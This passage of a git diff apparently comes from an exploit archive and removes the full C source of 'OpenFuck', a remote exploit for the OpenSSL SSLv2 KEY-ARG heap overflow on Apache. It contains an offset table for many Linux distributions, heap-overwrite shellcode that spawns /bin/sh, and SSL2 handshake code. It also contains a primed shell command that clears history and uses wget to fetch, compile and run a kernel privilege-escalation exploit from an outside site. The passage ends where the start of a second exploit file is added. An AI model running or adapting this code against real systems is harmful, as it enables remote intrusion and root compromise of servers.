(apache-1.3.20-5.1mdk)", - 0x0809ccde - }, - { - "Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)", - 0x0809ce14 - }, - { - "Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)", - 0x0809d262 - }, - { - "Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)", - 0x08083545 - }, - { - "Mandrake Linux 8.0 (apache-1.3.19-3)", - 0x0809ea98 - }, - { - "Mandrake Linux 8.1 (apache-1.3.20-3)", - 0x0809e97c - }, - { - "Mandrake Linux 8.2 (apache-1.3.23-4)", - 0x08086580 - }, - { "Mandrake Linux 8.2 #2 (apache-1.3.23-4)", - 0x08086484 - }, - { "Mandrake Linux 8.2 (apache-1.3.24)", - 0x08086665 - }, - - { "Mandrake Linux 9 (apache-1.3.26)", - 0x0808b864 - }, - { - "RedHat Linux ?.? GENERIC (apache-1.3.12-1)", - 0x0808c0f4 - }, - { - "RedHat Linux TEST1 (apache-1.3.12-1)", - 0x0808c0f4 - }, - { - "RedHat Linux TEST2 (apache-1.3.12-1)", - 0x0808c0f4 - }, - { - "RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)", - 0x080d2c35 - }, - { - "RedHat Linux 4.2 (apache-1.1.3-3)", - 0x08065bae - }, - { - "RedHat Linux 5.0 (apache-1.2.4-4)", - 0x0808c82c - }, - { - "RedHat Linux 5.1-Update (apache-1.2.6)", - 0x08092a45 - }, - { - "RedHat Linux 5.1 (apache-1.2.6-4)", - 0x08092c2d - }, - { - "RedHat Linux 5.2 (apache-1.3.3-1)", - 0x0806f049 - }, - { - "RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)", - 0x0808e4d8 - }, - { - "RedHat Linux 6.0 (apache-1.3.6-7)", - 0x080707ec - }, - { - "RedHat Linux 6.0 (apache-1.3.6-7)", - 0x080707f9 - }, - { - "RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)", - 0x0808fd52 - }, - { - "RedHat Linux 6.0 Update (apache-1.3.24)", - 0x80acd58 - }, - { - "RedHat Linux 6.1 (apache-1.3.9-4)1", - 0x0808ccc4 - }, - { - "RedHat Linux 6.1 (apache-1.3.9-4)2", - 0x0808ccdc - }, - { - "RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)", - 0x0808fd5d - }, - { - "RedHat Linux 6.1-fp2000 (apache-1.3.26)", - 0x082e6fcd - }, - { - "RedHat Linux 6.2 (apache-1.3.12-2)1", - 0x0808f689 - }, - { - "RedHat Linux 6.2 (apache-1.3.12-2)2", - 0x0808f614 - }, - { - "RedHat Linux 6.2 mod(apache-1.3.12-2)3", - 0xbffff94c - }, - - { - "RedHat Linux 6.2 update (apache-1.3.22-5.6)1", - 0x0808f9ec - }, - { - "RedHat Linux 6.2-Update (apache-1.3.22-5.6)2", - 0x0808f9d4 - }, - { - "Redhat Linux 7.x (apache-1.3.22)", - 0x0808400c - }, - { - "RedHat Linux 7.x (apache-1.3.26-1)", - 0x080873bc - }, - { "RedHat Linux 7.x (apache-1.3.27)", - 0x08087221 - }, - { - "RedHat Linux 7.0 (apache-1.3.12-25)1", - 0x0809251c - }, - { - "RedHat Linux 7.0 (apache-1.3.12-25)2", - 0x0809252d - }, - { - "RedHat Linux 7.0 (apache-1.3.14-2)", - 0x08092b98 - }, - { - "RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)", - 0x08084358 - }, - { - "RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)", - 0x0808438c - }, - { - "RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)", - 0x08086e41 - }, - { - "RedHat Linux 7.1 (apache-1.3.19-5)1", - 0x0809af8c - }, - { - "RedHat Linux 7.1 (apache-1.3.19-5)2", - 0x0809afd9 - }, - { - "RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)", - 0x0808438c - }, - { - "RedHat Linux 7.1-Update (1.3.22-5.7.1)", - 0x08084389 - }, - { - "RedHat Linux 7.1 (apache-1.3.22-src)", - 0x0816021c - }, - { - "RedHat Linux 7.1-Update (1.3.27-1.7.1)", - 0x08086ec89 - }, - { - "RedHat Linux 7.2 (apache-1.3.20-16)1", - 0x080994e5 - }, - { - "RedHat Linux 7.2 (apache-1.3.20-16)2", - 0x080994d4 - }, - { - "RedHat Linux 7.2-Update (apache-1.3.22-6)", - 0x08084045 - }, - { - "RedHat Linux 7.2 (apache-1.3.24)", - 0x80b0938 - }, - { - "RedHat Linux 7.2 (apache-1.3.26)", - 0x08161c16 - }, - { - "RedHat Linux 7.2 (apache-1.3.26-snc)", - 0x8161c14 - }, - { - - "Redhat Linux 7.2 (apache-1.3.26 w/PHP)1", - 0x08269950 - }, - { - "Redhat Linux 7.2 (apache-1.3.26 w/PHP)2", - 0x08269988 - }, - { - "RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)", - 0x08086af9 - }, - { - "RedHat Linux 7.3 (apache-1.3.23-11)1", - 0x0808528c - }, - { - "RedHat Linux 7.3 (apache-1.3.23-11)2", - 0x0808525f - }, - { - "RedHat Linux 7.3 (apache-1.3.27)", - 0x080862e4 - }, - { "RedHat Linux 8.0 (apache-1.3.27)", - 0x08084c1c - }, - { "RedHat Linux 8.0-second (apache-1.3.27)", - 0x0808151e - }, - { "RedHat Linux 8.0 (apache-2.0.40)", - 0x08092fa4 - }, - { - "Slackware Linux 4.0 (apache-1.3.6)", - 0x08088130 - }, - { - "Slackware Linux 7.0 (apache-1.3.9)", - 0x080a7fc0 - }, - { - "Slackware Linux 7.0 (apache-1.3.26)", - 0x083d37fc - }, - { "Slackware 7.0 (apache-1.3.26)2", - 0x083d2232 - }, - { - "Slackware Linux 7.1 (apache-1.3.12)", - 0x080a86a4 - }, - { - "Slackware Linux 8.0 (apache-1.3.20)", - 0x080ae67c - }, - { - "Slackware Linux 8.1 (apache-1.3.24)", - 0x080b0c60 - }, - { - "Slackware Linux 8.1 (apache-1.3.26)", - 0x080b2100 - }, - - { - "Slackware Linux 8.1-stable (apache-1.3.26)", - 0x080b0c60 - }, - { "Slackware Linux (apache-1.3.27)", - 0x080b1a3a - }, - { - "SuSE Linux 7.0 (apache-1.3.12)", - 0x0809f54c - }, - { - "SuSE Linux 7.1 (apache-1.3.17)", - 0x08099984 - }, - { - "SuSE Linux 7.2 (apache-1.3.19)", - 0x08099ec8 - }, - { - "SuSE Linux 7.3 (apache-1.3.20)", - 0x08099da8 - }, - { - "SuSE Linux 8.0 (apache-1.3.23)", - 0x08086168 - }, - { - "SUSE Linux 8.0 (apache-1.3.23-120)", - 0x080861c8 - }, - { - "SuSE Linux 8.0 (apache-1.3.23-137)", - 0x080861c8 - }, -/* this one unchecked cause require differend shellcode */ - { - "Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)", - 0xfd42630 - }, - -}; - -extern int errno; - -int cipher; -int ciphers; - -/* the offset of the local port from be beginning of the overwrite next chunk buffer */ -#define FINDSCKPORTOFS 208 + 12 + 46 - -unsigned char overwrite_session_id_length[] = - "AAAA" /* int master key length; */ - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */ - "\x70\x00\x00\x00"; /* unsigned int session id length; */ - -unsigned char overwrite_next_chunk[] = - "AAAA" /* int master key length; */ - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */ - "AAAA" /* unsigned int session id length; */ - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char session id[SSL MAX SSL SESSION ID LENGTH]; */ - "AAAA" /* unsigned int sid ctx length; */ - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid ctx[SSL MAX SID CTX LENGTH]; */ - "AAAA" /* int not resumable; */ - "\x00\x00\x00\x00" /* struct sess cert st *sess cert; */ - "\x00\x00\x00\x00" /* X509 *peer; */ - "AAAA" /* long verify result; */ - "\x01\x00\x00\x00" /* int references; */ - "AAAA" /* int timeout; */ - "AAAA" /* int time */ - "AAAA" /* int compress meth; */ - "\x00\x00\x00\x00" /* SSL CIPHER *cipher; */ - "AAAA" /* unsigned long cipher id; */ - "\x00\x00\x00\x00" /* STACK OF(SSL CIPHER) *ciphers; */ - "\x00\x00\x00\x00\x00\x00\x00\x00" /* CRYPTO EX DATA ex data; */ - "AAAAAAAA" /* struct ssl session st *prev,*next; */ - - "\x00\x00\x00\x00" /* Size of previous chunk */ - "\x11\x00\x00\x00" /* Size of chunk, in bytes */ - "fdfd" /* Forward and back pointers */ - "bkbk" - "\x10\x00\x00\x00" /* Size of previous chunk */ - "\x10\x00\x00\x00" /* Size of chunk, PREV INUSE is set */ - -/* shellcode start */ - "\xeb\x0a\x90\x90" /* jump 10 bytes ahead, land at shellcode */ - "\x90\x90\x90\x90" - "\x90\x90\x90\x90" /* this is overwritten with FD by the unlink macro */ - -/* 72 bytes findsckcode by LSD-pl */ - "\x31\xdb" /* xorl %ebx,%ebx */ - "\x89\xe7" /* movl %esp,%edi */ - "\x8d\x77\x10" /* leal 0x10(%edi),%esi */ - "\x89\x77\x04" /* movl %esi,0x4(%edi) */ - "\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */ - "\x89\x4f\x08" /* movl %ecx,0x8(%edi) */ - "\xb3\x10" /* movb $0x10,%bl */ - "\x89\x19" /* movl %ebx,(%ecx) */ - "\x31\xc9" /* xorl %ecx,%ecx */ - "\xb1\xff" /* movb $0xff,%cl */ - "\x89\x0f" /* movl %ecx,(%edi) */ - "\x51" /* pushl %ecx */ - "\x31\xc0" /* xorl %eax,%eax */ - "\xb0\x66" /* movb $0x66,%al */ - "\xb3\x07" /* movb $0x07,%bl */ - "\x89\xf9" /* movl %edi,%ecx */ - "\xcd\x80" /* int $0x80 */ - "\x59" /* popl %ecx */ - "\x31\xdb" /* xorl %ebx,%ebx */ - "\x39\xd8" /* cmpl %ebx,%eax */ - "\x75\x0a" /* jne */ - "\x66\xb8\x12\x34" /* movw $0x1234,%bx */ - "\x66\x39\x46\x02" /* cmpw %bx,0x2(%esi) */ - "\x74\x02" /* je */ - "\xe2\xe0" /* loop */ - "\x89\xcb" /* movl %ecx,%ebx */ - "\x31\xc9" /* xorl %ecx,%ecx */ - "\xb1\x03" /* movb $0x03,%cl */ - "\x31\xc0" /* xorl %eax,%eax */ - "\xb0\x3f" /* movb $0x3f,%al */ - "\x49" /* decl %ecx */ - "\xcd\x80" /* int $0x80 */ - "\x41" /* incl %ecx */ - "\xe2\xf6" /* loop */ - -/* 10 byte setresuid(0,0,0); by core */ - "\x31\xc9" /* xor %ecx,%ecx */ - "\xf7\xe1" /* mul %ecx,%eax */ - "\x51" /* push %ecx */ - "\x5b" /* pop %ebx */ - "\xb0\xa4" /* mov $0xa4,%al */ - "\xcd\x80" /* int $0x80 */ - - -/* bigger shellcode added by spabam */ - -/* "\xB8\x2F\x73\x68\x23\x25\x2F\x73\x68\xDC\x50\x68\x2F\x62\x69" - "\x6E\x89\xE3\x31\xC0\x50\x53\x89\xE1\x04\x0B\x31\xD2\xCD\x80" -*/ - - -/* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */ - "\x31\xc0" /* xorl %eax,%eax */ - "\x50" /* pushl %eax */ - "\x68""//sh" /* pushl $0x68732f2f */ - "\x68""/bin" /* pushl $0x6e69622f */ - "\x89\xe3" /* movl %esp,%ebx */ - "\x50" /* pushl %eax */ - "\x53" /* pushl %ebx */ - "\x89\xe1" /* movl %esp,%ecx */ - "\x99" /* cdql */ - "\xb0\x0b" /* movb $0x0b,%al */ - "\xcd\x80"; /* int $0x80 */ - -/* read and write buffer*/ -#define BUFSIZE 16384 - -/* hardcoded protocol stuff */ -#define CHALLENGE_LENGTH 16 -#define RC4_KEY_LENGTH 16 /* 128 bits */ -#define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2) - -/* straight from the openssl source */ -#define n2s(c,s) ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1])) )),c+=2) -#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s) )&0xff)),c+=2) - -/* we keep all SSL2 state in this structure */ -typedef struct { - int sock; - - /* client stuff */ - unsigned char challenge[CHALLENGE_LENGTH]; - unsigned char master_key[RC4_KEY_LENGTH]; - unsigned char key_material[RC4_KEY_MATERIAL_LENGTH]; - - /* connection id - returned by the server */ - int conn_id_length; - unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH]; - - /* server certificate */ - X509 *x509; - - /* session keys */ - unsigned char* read_key; - unsigned char* write_key; - RC4_KEY* rc4_read_key; - RC4_KEY* rc4_write_key; - - /* sequence numbers, used for MAC calculation */ - int read_seq; - int write_seq; - - /* set to 1 when the SSL2 handshake is complete */ - int encrypted; -} ssl_conn; - -#define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n" -#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n" - -long getip(char *hostname) { - struct hostent *he; - long ipaddr; - - if ((ipaddr = inet_addr(hostname)) < 0) { - if ((he = gethostbyname(hostname)) == NULL) { - perror("gethostbyname()"); - exit(-1); - } - memcpy(&ipaddr, he->h_addr, he->h_length); - } - return ipaddr; -} - -/* mixter's code w/enhancements by core */ - -int sh(int sockfd) { - char snd[1024], rcv[1024]; - fd_set rset; - int maxfd, n; - - /* Priming commands */ - strcpy(snd, COMMAND1 "\n"); - write(sockfd, snd, strlen(snd)); - - strcpy(snd, COMMAND2 "\n"); - write(sockfd, snd, strlen(snd)); - - /* Main command loop */ - for (;;) { - FD_SET(fileno(stdin), &rset); - FD_SET(sockfd, &rset); - - maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1; - select(maxfd, &rset, NULL, NULL, NULL); - - if (FD_ISSET(fileno(stdin), &rset)) { - bzero(snd, sizeof(snd)); - fgets(snd, sizeof(snd)-2, stdin); - write(sockfd, snd, strlen(snd)); - } - - if (FD_ISSET(sockfd, &rset)) { - bzero(rcv, sizeof(rcv)); - - if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) { - printf("Good Bye!\n"); - return 0; - } - - if (n < 0) { - perror("read"); - return 1; - } - - fputs(rcv, stdout); - fflush(stdout); /* keeps output nice */ - } - } /* for(;;) */ -} - -/* Returns the local port of a connected socket */ -int get_local_port(int sock) -{ - struct sockaddr_in s_in; - unsigned int namelen = sizeof(s_in); - - if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) { - printf("Can't get local port: %s\n", strerror(errno)); - exit(1); - } - - return s_in.sin_port; -} - -/* Connect to a host */ -int connect_host(char* host, int port) -{ - struct sockaddr_in s_in; - int sock; - - s_in.sin_family = AF_INET; - s_in.sin_addr.s_addr = getip(host); - s_in.sin_port = htons(port); - - if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) { - printf("Could not create a socket\n"); - exit(1); - } - - if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) { - printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno)); - exit(1); - } - - return sock; -} - -/* Create a new ssl conn structure and connect to a host */ -ssl_conn* ssl_connect_host(char* host, int port) -{ - ssl_conn* ssl; - - if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) { - printf("Can't allocate memory\n"); - exit(1); - } - - /* Initialize some values */ - ssl->encrypted = 0; - ssl->write_seq = 0; - ssl->read_seq = 0; - - ssl->sock = connect_host(host, port); - - return ssl; -} - -/* global buffer used by the ssl result() */ -char res_buf[30]; - -/* converts an SSL error code to a string */ -char* ssl_error(int code) { - switch (code) { - case 0x00: return "SSL2 PE UNDEFINED ERROR (0x00)"; - case 0x01: return "SSL2 PE NO CIPHER (0x01)"; - case 0x02: return "SSL2 PE NO CERTIFICATE (0x02)"; - case 0x04: return "SSL2 PE BAD CERTIFICATE (0x03)"; - case 0x06: return "SSL2 PE UNSUPPORTED CERTIFICATE TYPE (0x06)"; - default: - sprintf(res_buf, "%02x", code); - return res_buf; - } -} - -/* read len bytes from a socket. boring. */ -int read_data(int sock, unsigned char* buf, int len) -{ - int l; - int to_read = len; - - do { - if ((l = read(sock, buf, to_read)) < 0) { - printf("Error in read: %s\n", strerror(errno)); - exit(1); - } - to_read -= len; - } while (to_read > 0); - - return len; -} - -/* reads an SSL packet and decrypts it if necessery */ -int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size) -{ - int rec_len, padding; - - read_data(ssl->sock, buf, 2); - - if ((buf[0] & 0x80) == 0) { - /* three byte header */ - rec_len = ((buf[0] & 0x3f) << 8) | buf[1]; - read_data(ssl->sock, &buf[2], 1); - padding = (int)buf[2]; - } - else { - /* two byte header */ - rec_len = ((buf[0] & 0x7f) << 8) | buf[1]; - padding = 0; - } - - if ((rec_len <= 0) || (rec_len > buf_size)) { - printf("read_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len); - exit(1); - } - - read_data(ssl->sock, buf, rec_len); - - if (ssl->encrypted) { - if (MD5_DIGEST_LENGTH + padding >= rec_len) { - if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) { - /* the server didn't switch to encryption due to an error */ - return 0; - } - else { - printf("read_ssl_packet: Encrypted message is too short (rec_len = %d)\n", rec_len); - exit(1); - } - } - - /* decrypt the encrypted part of the packet */ - RC4(ssl->rc4_read_key, rec_len, buf, buf); - - /* move the decrypted message in the beginning of the buffer */ - rec_len = rec_len - MD5_DIGEST_LENGTH - padding; - memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len); - } - - if (buf[0] == SSL2_MT_ERROR) { - if (rec_len != 3) { - printf("Malformed server error message\n"); - exit(1); - } - else { - return 0; - } - } - - return rec_len; -} - -/* send an ssl packet, encrypting it if ssl->encrypted is set */ -void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len) -{ - unsigned char buf[BUFSIZE]; - unsigned char* p; - int tot_len; - MD5_CTX ctx; - int seq; - - - if (ssl->encrypted) - tot_len = rec_len + MD5_DIGEST_LENGTH; /* RC4 needs no padding */ - else - tot_len = rec_len; - - if (2 + tot_len > BUFSIZE) { - printf("send_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len); - exit(1); - } - - p = buf; - s2n(tot_len, p); - - buf[0] = buf[0] | 0x80; /* two byte header */ - - if (ssl->encrypted) { - /* calculate the MAC */ - seq = ntohl(ssl->write_seq); - - MD5_Init(&ctx); - MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH); - MD5_Update(&ctx, rec, rec_len); - MD5_Update(&ctx, &seq, 4); - MD5_Final(p, &ctx); - - p+=MD5_DIGEST_LENGTH; - - memcpy(p, rec, rec_len); - - /* encrypt the payload */ - RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]); - - } - else { - memcpy(p, rec, rec_len); - } - - send(ssl->sock, buf, 2 + tot_len, 0); - - /* the sequence number is incremented by both encrypted and plaintext packets -*/ - ssl->write_seq++; -} - -/* Send a CLIENT HELLO message to the server */ -void send_client_hello(ssl_conn *ssl) -{ - int i; - unsigned char buf[BUFSIZE] = - "\x01" /* client hello msg */ - - "\x00\x02" /* client version */ - "\x00\x18" /* cipher specs length */ - "\x00\x00" /* session id length */ - "\x00\x10" /* challenge length */ - - "\x07\x00\xc0\x05\x00\x80\x03\x00" /* cipher specs data */ - "\x80\x01\x00\x80\x08\x00\x80\x06" - "\x00\x40\x04\x00\x80\x02\x00\x80" - - ""; /* session id data */ - - /* generate CHALLENGE LENGTH bytes of challenge data */ - for (i = 0; i < CHALLENGE_LENGTH; i++) { - ssl->challenge[i] = (unsigned char) (rand() >> 24); - } - memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH); - - send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH); -} - -/* Get a SERVER HELLO response from the server */ -void get_server_hello(ssl_conn* ssl) -{ - unsigned char buf[BUFSIZE]; - unsigned char *p, *end; - int len; - int server_version, cert_length, cs_length, conn_id_length; - int found; - - if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) { - printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1]))); - exit(1); - } - if (len < 11) { - printf("get_server_hello: Packet too short (len = %d)\n", len); - exit(1); - } - - p = buf; - - if (*(p++) != SSL2_MT_SERVER_HELLO) { - printf("get_server_hello: Expected SSL2 MT SERVER HELLO, got %x\n", (int)p[-1]); - exit(1); - } - - if (*(p++) != 0) { - printf("get_server_hello: SESSION-ID-HIT is not 0\n"); - exit(1); - } - - if (*(p++) != 1) { - printf("get_server_hello: CERTIFICATE-TYPE is not SSL CT X509 CERTIFICATE\n"); - exit(1); - } - - n2s(p, server_version); - if (server_version != 2) { - printf("get_server_hello: Unsupported server version %d\n", server_version); - exit(1); - } - - n2s(p, cert_length); - n2s(p, cs_length); - n2s(p, conn_id_length); - - if (len != 11 + cert_length + cs_length + conn_id_length) { - printf("get_server_hello: Malformed packet size\n"); - exit(1); - } - - /* read the server certificate */ - ssl->x509 = NULL; - ssl->x509=d2i_X509(NULL,&p,(long)cert_length); - if (ssl->x509 == NULL) { - printf("get server hello: Cannot parse x509 certificate\n"); - exit(1); - } - - if (cs_length % 3 != 0) { - printf("get server hello: CIPHER-SPECS-LENGTH is not a multiple of 3\n"); - exit(1); - } - - found = 0; - for (end=p+cs_length; p < end; p += 3) { - if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80)) - found = 1; /* SSL CK RC4 128 WITH MD5 */ - } - - if (!found) { - printf("get server hello: Remote server does not support 128 bit RC4\n"); - exit(1); - } - - if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) { - printf("get server hello: CONNECTION-ID-LENGTH is too long\n"); - exit(1); - } - - /* The connection id is sent back to the server in the CLIENT FINISHED packet */ - ssl->conn_id_length = conn_id_length; - memcpy(ssl->conn_id, p, conn_id_length); -} - -/* Send a CLIENT MASTER KEY message to the server */ - -void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int key_arg_overwrite_len) { - int encrypted_key_length, key_arg_length, record_length; - unsigned char* p; - int i; - EVP_PKEY *pkey=NULL; - - unsigned char buf[BUFSIZE] = - "\x02" /* client master key message */ - "\x01\x00\x80" /* cipher kind */ - "\x00\x00" /* clear key length */ - "\x00\x40" /* encrypted key length */ - "\x00\x08"; /* key arg length */ - - p = &buf[10]; - - /* generate a 128 byte master key */ - for (i = 0; i < RC4_KEY_LENGTH; i++) { - ssl->master_key[i] = (unsigned char) (rand() >> 24); - } - - pkey=X509_get_pubkey(ssl->x509); - if (!pkey) { - printf("send client master key: No public key in the server certificate\n"); - exit(1); - } - - if (pkey->type != EVP_PKEY_RSA) { - printf("send client master key: The public key in the server certificate is not a RSA key\n"); - exit(1); - } - - /* Encrypt the client master key with the server public key and put it in the packet */ - encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], pkey->pkey.rsa, RSA_PKCS1_PADDING); - if (encrypted_key_length <= 0) { - printf("send client master key: RSA encryption failure\n"); - exit(1); - } - - p += encrypted_key_length; - - if (key_arg_overwrite) { - /* These 8 bytes fill the key arg array on the server */ - for (i = 0; i < 8; i++) { - *(p++) = (unsigned char) (rand() >> 24); - } - /* This overwrites the data following the key arg array */ - memcpy(p, key_arg_overwrite, key_arg_overwrite_len); - - key_arg_length = 8 + key_arg_overwrite_len; - } - else { - key_arg_length = 0; /* RC4 doesn't use KEY-ARG */ - } - p = &buf[6]; - s2n(encrypted_key_length, p); - s2n(key_arg_length, p); - record_length = 10 + encrypted_key_length + key_arg_length; - send_ssl_packet(ssl, buf, record_length); - ssl->encrypted = 1; -} -void generate_key_material(ssl_conn* ssl) -{ - unsigned int i; - MD5_CTX ctx; - unsigned char *km; - unsigned char c='0'; - - km=ssl->key_material; - for (i=0; imaster_key,RC4_KEY_LENGTH); - MD5_Update(&ctx,&c,1); - c++; - MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH); - MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length); - MD5_Final(km,&ctx); - km+=MD5_DIGEST_LENGTH; - } -} -void generate_session_keys(ssl_conn* ssl) -{ - generate_key_material(ssl); - ssl->read_key = &(ssl->key_material[0]); - ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY)); - RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key); - - ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]); - ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY)); - RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key); -} -void get_server_verify(ssl_conn* ssl) -{ - unsigned char buf[BUFSIZE]; - int len; - if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) { - printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1]))); - exit(1); - } - if (len != 1 + CHALLENGE_LENGTH) { - printf("get server verify: Malformed packet size\n"); - exit(1); - } - if (buf[0] != SSL2_MT_SERVER_VERIFY) { - printf("get server verify: Expected SSL2 MT SERVER VERIFY, got %x\n", (int)buf[0]); - exit(1); - } - if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) { - printf("get server verify: Challenge strings don't match\n"); - exit(1); - } -} -void send_client_finished(ssl_conn* ssl) -{ - unsigned char buf[BUFSIZE]; - buf[0] = SSL2_MT_CLIENT_FINISHED; - memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length); - send_ssl_packet(ssl, buf, 1+ssl->conn_id_length); -} -void get_server_finished(ssl_conn* ssl) -{ - unsigned char buf[BUFSIZE]; - int len; - int i; - if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) { - printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1]))); - exit(1); - } - if (buf[0] != SSL2_MT_SERVER_FINISHED) { - printf("get server finished: Expected SSL2 MT SERVER FINISHED, got %x\n", (int)buf[0]); - exit(1); - } - - if (len <= 112 /*17*/) { - printf("This server is not vulnerable to this attack.\n"); - exit(1); - } - cipher = *(int*)&buf[101]; - ciphers = *(int*)&buf[109]; - printf("cipher: 0x%x ciphers: 0x%x\n", cipher, ciphers); -} -void get_server_error(ssl_conn* ssl) -{ - unsigned char buf[BUFSIZE]; - int len; - - if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) { - printf("get server finished: Expected SSL2 MT ERROR, got %x\n", (int)buf[0]); - exit(1); - } -} -void usage(char* argv0) -{ - int i; - printf(": Usage: %s target box [port] [-c N]\n\n", argv0); - printf(" target - supported box eg: 0x00\n"); - printf(" box - hostname or IP address\n"); - printf(" port - port for ssl connection\n"); - printf(" -c open N connections. (use range 40-50 if u dont know)\n"); - printf(" \n\n"); - printf(" Supported OffSet:\n"); - - for (i=0; i<=MAX_ARCH; i++) { - printf("\t0x%02x - %s\n", i, architectures[i].desc); - } - printf("\nFuck to all guys who like use lamah ddos. Read SRC to have no surprise\n"); - - exit(1); -} -int main(int argc, char* argv[]) -{ - char* host; - int port = 443; - int i; - int arch; - int N = 0; - ssl_conn* ssl1; - ssl_conn* ssl2; - - printf("\n"); - printf("*******************************************************************\n"); - printf("* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *\n"); - printf("*******************************************************************\n"); - printf("* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *\n"); - printf("* #hackarena irc.brasnet.org *\n"); - printf("* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *\n"); - printf("* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *\n"); - printf("* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *\n"); - printf("*******************************************************************\n"); - printf("\n"); - if ((argc < 3) || (argc > 6)) - usage(argv[0]); - sscanf(argv[1], "0x%x", &arch); - if ((arch < 0) || (arch > MAX_ARCH)) - usage(argv[0]); - host = argv[2]; - if (argc == 4) - port = atoi(argv[3]); - else if (argc == 5) { - if (strcmp(argv[3], "-c")) - usage(argv[0]); - N = atoi(argv[4]); - } - else if (argc == 6) { - port = atoi(argv[3]); - if (strcmp(argv[4], "-c")) - usage(argv[0]); - N = atoi(argv[5]); - } - srand(0x31337); - for (i=0; isock); - overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff); - overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff); - *(int*)&overwrite_next_chunk[156] = cipher; - *(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12; - *(int*)&overwrite_next_chunk[196] = ciphers + 16; /* shellcode address */ - send_client_hello(ssl2); - get_server_hello(ssl2); - send_client_master_key(ssl2, overwrite_next_chunk, sizeof(overwrite_next_chunk)-1); - generate_session_keys(ssl2); - get_server_verify(ssl2); - for (i = 0; i < ssl2->conn_id_length; i++) { - ssl2->conn_id[i] = (unsigned char) (rand() >> 24); - } - send_client_finished(ssl2); - get_server_error(ssl2); - printf("Spawning shell...\n"); - sleep(1); - sh(ssl2->sock); - close(ssl2->sock); - close(ssl1->sock); - return 0; -} -/* spabam: It isn't 0day */ - - - diff --git a/platforms/unix/remote/40347.txt b/platforms/unix/remote/40347.txt new file mode 100755 index 000000000..435903892 --- /dev/null +++ b/platforms/unix/remote/40347.txt @@ -0,0 +1,444 @@ +/* + * openssl-too-open.c - OpenSSL remote exploit + * Spawns a nobody/apache shell on Apache, root on other servers. + * + * by Solar Eclipse + * + * Thanks to Core, HD Moore, 